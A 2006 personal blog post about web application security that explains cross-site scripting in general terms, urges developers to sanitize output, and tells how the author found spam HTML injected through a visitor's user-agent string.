Website Security

Wednesday, August 16, 2006 by darco
Posted in , ,

I've learned quite a bit over the past year or so that I've been developing darcness, but one lesson stands out above all others: It is just staggering how many ways there are to compromise the security of a dynamic website.

Making a website secure is a surprisingly non-trivial task that requires plenty of thought and discipline. What makes it worse is that it is all too easy to create gaping security holes without realizing it.

For example, if there is a way for someone to get unsanitized HTML to display on a page on your site, then you are hosed. Why? That unsanitized HTML could very well contain a JavaScript program. If you view that page when you are logged into your site, then that JavaScript has the same access privileges you do. This is called a Cross-Site Scripting Attack. Like I said, at that point you are hosed.

But this isn't that difficult to prevent, right? Well, in theory, yes. All you have to do is make sure that all strings get converted to XML entities (or are sanitized in some other way, like with kses) before being displayed.

There are, of course, all of the obvious places you want sanitize, such as search queries, user comments, and user account info... But there are plenty of other non-obvious spots where it may be possible to get unsanitized HTML to display on a website.

That happened today when I was browing thru the user-agents of people who have visited my site today. As I was browsing, I noticed something different—a link. A clickable link. Right there in the agent list. Someone had put HTML in their user agent string!

In this case, it was simply some user-agent spam (::shiver::) but that harmless <a> tag could have just as easily been a <script> tag. Yikes!

But that's just the tip of the iceberg. Responsible web developers must also keep in mind:

To be perfectly honest, I don't think most developers of dynamic web applications are knowledgeable of these sorts of attacks, which is rather scary.

What's the moral of this story? If you are a web developer, be paranoid. Very paranoid.